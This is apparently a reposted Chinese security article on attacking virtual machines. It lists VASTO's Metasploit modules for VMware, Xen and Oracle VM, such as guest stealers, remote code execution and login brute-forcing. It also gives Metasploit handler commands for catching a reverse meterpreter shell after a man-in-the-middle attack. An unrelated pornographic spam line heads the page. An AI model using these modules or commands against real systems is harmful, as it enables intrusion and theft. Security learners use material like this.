自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

針對虛擬機(jī)的滲透測試

安全
如今虛擬化在各個企業(yè)中應(yīng)用的越來越多,且火熱的云計(jì)算也依托于此技術(shù)。虛擬化技術(shù)確實(shí)能夠使物理資源的利用更加靈活和便捷,那么虛擬機(jī)的安全性如何?相比傳統(tǒng)架構(gòu),是否像傳說中的一樣安全?

如今虛擬化在各個企業(yè)中應(yīng)用的越來越多,且火熱的云計(jì)算也依托于此技術(shù)。虛擬化技術(shù)確實(shí)能夠使物理資源的利用更加靈活和便捷,那么虛擬機(jī)的安全性如何?相比傳統(tǒng)架構(gòu),是否像傳說中的一樣安全?

什么是虛擬化

虛擬化是指計(jì)算機(jī)元件在虛擬的基礎(chǔ)上而不是真實(shí)的基礎(chǔ)上運(yùn)行。虛擬化技術(shù)可以擴(kuò)大硬件的容量,簡化軟件的重新配置過程。CPU的虛擬化技術(shù)可以單CPU模擬多CPU并行,允許一個平臺同時(shí)運(yùn)行多個操作系統(tǒng),并且應(yīng)用程序都可以在相互獨(dú)立的空間內(nèi)運(yùn)行而互不影響,從而顯著提高計(jì)算機(jī)的工作效率。我們先來看看虛擬機(jī)的層次結(jié)構(gòu)圖。

虛擬機(jī)完全獨(dú)立于其底層物理硬件。 例如,你可以為虛擬機(jī)配置與底層硬件上存在的物理組件完全不同的虛擬組件(例如,CPU、網(wǎng)卡、SCSI 控制器)。 同一物理服務(wù)器上的各個虛擬機(jī)甚至可以運(yùn)行不同類型的操作系統(tǒng)(Windows、Linux 等)

針對虛擬機(jī)的滲透測試

VASTO是一個專用的虛擬機(jī)滲透測試工具,支持VMware, Oracle和Xen,可以與神器Metasploit有很好的結(jié)合。使用前需要先解壓,然后復(fù)制metasploit文件夾下中

VASTO的主要模塊如下,功能還是比較強(qiáng)大的

abiquo_guest_stealer – Abiquo guest stealer

abiquo_poison – Abiquo poison

eucalyptus_bouncer – Eucalyptus Bouncer

eucalyptus_poison – Eucalyptus Poison

oraclevm_oravma_fileread – Oracle VM agent remote code execution

vmware_autopwner – VMautopwn

vmware_guest_stealer – VMware Guest Stealer

vmware_login – VMware Login check scanner

vmware_session_rider – VMware Session Rider

vmware_studio_upload – VMware Studio<2.0.0.946-172280 Remote Code Execution

vmware_updatemanager_traversal – Update manager path traversal

vmware_version – VMware products fingerprintervmware_vilurker – VIlurker VIclient attack

vmware_webaccess_portscan – VMware Web Access Relay Port Scanner

xen_login – Xen Login Check Scanner

oracle_oravma_exec – Oracle VM agent remote code execution

vmware_sfcbd_exec - VMware VAMI-sfcbd remote code exec

vmware_tomcat_killer – VMware tomcat killer

Versionsscanner Modul:

用于判斷VM的版本等信息

Login Scanner Modul:

這個模塊可以使用字典嘗試暴力登錄虛擬機(jī)

vilurker module

這個模塊原理即利用ettercap等進(jìn)行中間人攻擊,欺騙成功后,當(dāng)被攻擊者(client)訪問server時(shí)會彈出窗體,若點(diǎn)擊即反彈一個meterpreter。

先multi/handler監(jiān)聽

msf > use multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST <Local Host IP here>

msf exploit(handler) > exploit

欺騙過程如下

返回shell(meterpreter)

責(zé)任編輯:藍(lán)雨淚 來源: freebuf
相關(guān)推薦

2017-02-09 09:25:43

2013-03-15 14:59:03

VMwarevSphere ESXWorkstation

2012-05-18 10:22:23

2020-01-17 10:52:37

無服務(wù)器容器技術(shù)

2010-07-26 09:02:38

2013-07-17 09:32:58

2009-08-21 16:59:42

VMware Play

2023-04-26 07:51:36

虛擬機(jī)操作系統(tǒng)進(jìn)程

2024-07-23 16:22:54

2014-02-21 11:20:34

KVMXen虛擬機(jī)

2023-09-03 17:05:20

虛擬機(jī)

2012-04-10 10:29:29

2018-06-19 15:39:21

HeapJava虛擬機(jī)

2011-06-22 13:35:55

JVM

2011-05-13 10:49:50

虛擬機(jī)Oracle安裝

2010-12-23 14:05:12

虛擬機(jī)

2011-12-12 09:08:48

OpenStack虛擬機(jī)監(jiān)控

2009-06-12 16:02:58

裝載Java虛擬機(jī)

2010-01-21 11:17:36

xen虛擬機(jī)

2022-08-14 09:11:13

Kubernetes容器云原生
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號